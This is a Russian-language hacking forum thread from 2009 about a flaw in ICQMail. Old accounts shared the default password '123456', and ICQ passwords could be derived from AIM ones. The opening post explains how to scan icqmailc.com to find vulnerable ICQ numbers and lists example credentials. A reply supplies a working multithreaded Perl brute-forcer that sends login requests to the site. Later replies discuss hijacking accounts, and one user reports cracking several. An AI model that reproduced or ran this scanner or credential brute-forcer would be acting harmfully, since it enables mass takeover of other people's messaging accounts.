ICQMAILC.COM - новый баг icq!

Discussion in 'Skype, IRC, ICQ, Jabber и другие IM' started by Peklots, 28 Jan 2009.

  1. Peklots

    Peklots Elder - Старейшина

    Joined:
    28 Sep 2008
    Messages:
    413
    Likes Received:
    144
    Reputations:
    36
    Существует три вида известного сервиса «ICQMAIL» (первые два уже в прошлом):

    * Старейший icqmail - http://company.icq.com/info/press/press_release29.html
    * Прошлый icqmail - http://www.mail2world.net/net/company/pr11-22-2004.asp
    * Текущий icqmail (бета) - http://www.icqmail.com/

    В ноябре 2004 был найден баг когда ICQ-пользователь использовал старейший ICQ Mail и регистрировал ICQMail-аккаунт, при этом регистрировался также названный AIM-ник (например при регистрации user23456@icqmail.com, регистрировался AIM-ник «user23456»).

    Потому что AIM старее, чем ICQMail и потому что множество AIM-ников уже были зарегистрированы, пользователям ICQ сложно было выбрать себе свободный для регистрации ICQMail.

    Некоторые люди сделали «брутфорс» и было найдено то, что некоторые из старых ICQMail-аккаунтов имеют уникальный общий пароль — «123456». Было возможно войти в аккаунт ICQMail-аккаунт одного из основателей ICQ (Yair Goldfinger — ICQ# 80000) с паролем: 123456 (сейчас это доступно на icqmailc.com).
    Хакер получил возможность взломать ICQMail (двумя различными способами) через универсальный пароль (данный метод работает на некоторых аккаунтах) или взломать admin@icqmail.com который имеет панель управления системы ICQMail (метод работающий на всех ICQMail аккаунтах) в опциях которой, была возможность возвращать ранее упомянутые автоматически созданные AIM-ники, пароли которых совпадали с ICQMail аккаутом привязанным к номеру ICQ. Пароли AIM-ников были равны «p_icqпароль» (например, если на AIM-нике пароль был «p_miracle», пароль на номере ICQ был: miracle). Взломщику нужно было лишь удалить «p_» из пароля к аккаунту AIM для взлома ICQ аккаунта.

    Большинство номеров было присоединено к ICQMail, то есть присоединенные к старым ICQMail-аккаунтам (old style ICQMails). Большая часть таких аккаунтов имеет универсальный пароль «123456». Таким образом, влом их был возможен через страницу восстановления пароля AIM-аккаунта — http://www.aim.com/help_faq/forgot_p...d/password.adp

    6-го сентября 2008 года много пользователей ICQMail получили данное письмо от администрации ICQ:



    И в конце октября 2008 года последний вид ICQMail был запушен (доступен всем он стал немного познее). Новый ICQMail представлял из себя AIMMail. Новый ICQMail был более защищенным потому, что сделан на так-называемой «karma» проверкой ICQ пароля. Первые два ICQMail системы были потерянны, но много пользователей были не довольны потерей содержимого их ICQMail-аккаунтов и администрация ICQ написало следующее сообщение http://www.icq.com/help/view_faq.php?faq_id=8024: «Ваши старые E-Mail не перенесены в новую ICQmail систему. Вы можете видеть старые E-Mail адреса в старой системе www.icqmailc.com, но вы не можете отправлять или получать письма с них.»

    Таким образом, предыдущий вид ICQMail доступен на сайте www.icqmailc.com в конце октября. Аккаунты ICQMail на этом сайте совпадают с паролями на предыдущих версиях ICQMail и не совпадают с текущими паролями нового ICQMail. Как было упомянуто много аккаунтов предыдущего ICQMail имеют универсальный пароль «123456» и они имею такой-же пароль на www.icqmailc.com.

    Существующий «123456» баг на www.icqmailc.com мог быть использован взломщиками, которые могут сделать сканер, который может проверять какие ICQ-аккаунты имеют ICQMail и какие из них имеют универсальный пароль. Метод сканирования очень простой: номер ICQ может быть введён в поле «ICQMail ID». ICQMail не присоединён если появляется ошибка «Please enter a valid username.». Если к номеру присоединен ICQMail-аккаунт и пароль не «123456», текст ошибки будет содержать «Please enter the correct password for this account.». Иначе, если к номеру ICQ присоединён ICQMail-аккаунт и пароль к нему «123456», то сканер может получить имя ICQMail-аккаунта продолжая вход в систему. Для примера ICQMail ID: 111111, Пароль: 123456, имя аккаунта: glenda111111@icqmail.com

    Часто имя аккаунта ICQMail (или первые 8 символов) совпадает с паролем с паролем номера ICQ к которому ICQMail привязан. Для примера: ICQMailID: 203007, Пароль: 123456. Полученный E-Mail: hogemp@icqmail.com, номер ICQ: 203007, пароль: hogemp (конечно сейчас пароль уже другой, но я был информирован что пароль в точности соответствовал)

    Простое сканирование аккаунтов icqmailc.com и проверка паролей сделанное хакером может привести к массовому взлому номеров ICQ.

    Наверное хорошая идея для исправления данного бага: работа сканера будет не возможна, если администрация ICQ заблокирует вход в icqmailc с номерами ICQ введёнными в ICQMail ID и сделает доступным вход только по E-Mail.

    Список ICQMail-аккаунтов 5-6 знаков.

    C вами были [ e l i T e ], flabber и .fry​
    \

    sp/
    Кул что сказать)
     
    6 people like this.
  2. X-Venom

    X-Venom Banned

    Joined:
    29 Apr 2008
    Messages:
    777
    Likes Received:
    370
    Reputations:
    21
    статью надо было в уязвимости
     
  3. Paha007

    Paha007 Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    141
    Likes Received:
    115
    Reputations:
    1
    Чето я ваще ниче не понял...но всерно спс...
    У кого как успехи? кто нибудь что нибудь урвал?
     
  4. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    895
    Likes Received:
    616
    Reputations:
    211
    давно известно уже
     
  5. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    895
    Likes Received:
    616
    Reputations:
    211
    forum.asechka.ru/showthread.php?p=489677
    + мой многопоточний брутер )
    PHP:
    #! /usr/bin/perl -w

    use IO::Socket;
    use 
    warnings;
    use 
    threads;
    use 
    threads::shared;
    use 
    Fcntl ':flock';

    #=====] eLwaux [==================================================================
    #================================================================================

    my $iCQ  shared 80000;
    my $threads    3;

    #========================
    #== start.. =======
    #================================================================================

    open (FILE'<icqmailc.com.pass.txt') || die(" [-] icqmailc.com.pass.txt not found!\n");
    my @pas shared = <FILE>;
    chomp(@pas);
    close(FILE);

    $time      time
    printf " [ ] started [".localtime()."]\n\n";

    for(
    0..$threads) {$trl[$_] = threads->create(\&Brut$_);}
    for(@
    trl) { $_->join; }

    $time time-$time;
    printf "\n [ ] finished [".localtime()."]\n";
    printf " [i] time elapsed: $time sec\n";

    <
    stdin>;

    sub Brut{

        while(
    $iCQ<999999#iCQ num #999.999.999
        
    {    
            {
    lock($iCQ);$num=$iCQ;$iCQ++;}
            foreach 
    my $psw(@pas){ 

            
    $post    'faction=login&domain=icqmail.com&username='.$num.'&password='.$psw.'&RememberMe=on';
            
    $header  
                   
    "POST http://icqmailc.com/default.asp HTTP/1.1\r\n".
                   
    "Host: icqmailc.com\r\n".
                   
    "User-Agent: icq.icq (icq)\r\n".
                   
    "Referer: http://icqmailc.com\r\n".
                   
    "Content-Type: application/x-www-form-urlencoded\r\n".
                   
    "Cookie: temp=; lang=en; domaincode=icq; remember%5Fme=secure=&Domain=icqmail%2Ecom&autologin=&Username=".$num."&value=TRUE; M2W3=height=800&width=1280; HasSideAd=no; MBXPercent=0%2E7; customguitemp=; welcome=\r\n".
                   
    "Content-Length: ".length($post)."\r\n\r\n".
                   
    "$post\r\n\r\n";
            
            
    my $sock sock();
            print 
    $sock $header;            

            while(
    my $answer = <$sock>){
                if (
    $answer=~/Content-Length: (\d{1,9})/) {
                if ($
    1<1000) {print ' [+] '.$num.' : '.$psw."\n";s2f('result.txt','++ '.$num.':'.$psw."\n");}
                        else {print 
    '  -  '.$num.' : '.$psw."\n";s2f('result.txt','-  '.$num.':'.$psw."\n");}
                
    last;
                }
                if(
    $answer=~/<\/html>/){last;}
            }
            
    sleep(0.5);
            
    close($sock);    
            
            
            
            
            }
        }
    }

    #=============================================================================
    #=============================================================================

     
    sub s2f {
         
    open(FILE'>>'.$_[0]);
         print 
    FILE $_[1];
         
    close(FILE);
         }



    #create new socket connection
    sub sock {
        
    my $sock;
        do {
            
    $sock = new IO::Socket::INET 
                
    (
                    
    PeerAddr => 'icqmailc.com',
                       
    PeerPort => 80,
                       
    PeerProto => 'tcp'
                       
    TimeOut => 10
                
    ) or print "[-] connection error!";
            } while (!
    $sock);
        return 
    $sock;
    }

    #=============================================================================
    #=============================================================================
     
    1 person likes this.
  6. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    411
    Likes Received:
    169
    Reputations:
    12
    Блин((( я тож ничего не понял(((
     
    1 person likes this.
  7. Exlibris

    Exlibris Elder - Старейшина

    Joined:
    26 Feb 2007
    Messages:
    391
    Likes Received:
    397
    Reputations:
    27
    мдэ, рабочих номерков вроде как уже не осталось, попробовал несколько нумов, пароль не подходит, хотя в мыло заходит...
     
  8. Peklots

    Peklots Elder - Старейшина

    Joined:
    28 Sep 2008
    Messages:
    413
    Likes Received:
    144
    Reputations:
    36
    Дак мыла могут быть примаками))
     
  9. iSeoBot

    iSeoBot Elder - Старейшина

    Joined:
    11 Apr 2008
    Messages:
    185
    Likes Received:
    67
    Reputations:
    13
    боянищееееее :(
     
    2 people like this.
  10. hafiz

    hafiz Banned

    Joined:
    8 Jan 2009
    Messages:
    98
    Likes Received:
    41
    Reputations:
    5
    статья хорошая респект автору, токо на ретрив как то они не идут!!! вот что хуже
     
  11. Olegros911

    Olegros911 Banned

    Joined:
    7 Apr 2008
    Messages:
    164
    Likes Received:
    40
    Reputations:
    -7
    слышал пробывал ....не катит и походу давно уже это прикрыли как
     
  12. SmоrK

    SmоrK Member

    Joined:
    19 Jan 2009
    Messages:
    27
    Likes Received:
    15
    Reputations:
    0
    а я попробывал по другому взял бузу этих мыл и про бурул ..
    например 10101 - edithpniel@icqmail.com
    я взял 10101;edithpniel убрал посли сабаки все.. разделил точкой запятой и запустил брутку... вобще открылось 6-ть шестерок... правдо некрасивых ну всеравно 6-ки! :) пробрутил еще правдо не все... список большой! :)
     
    1 person likes this.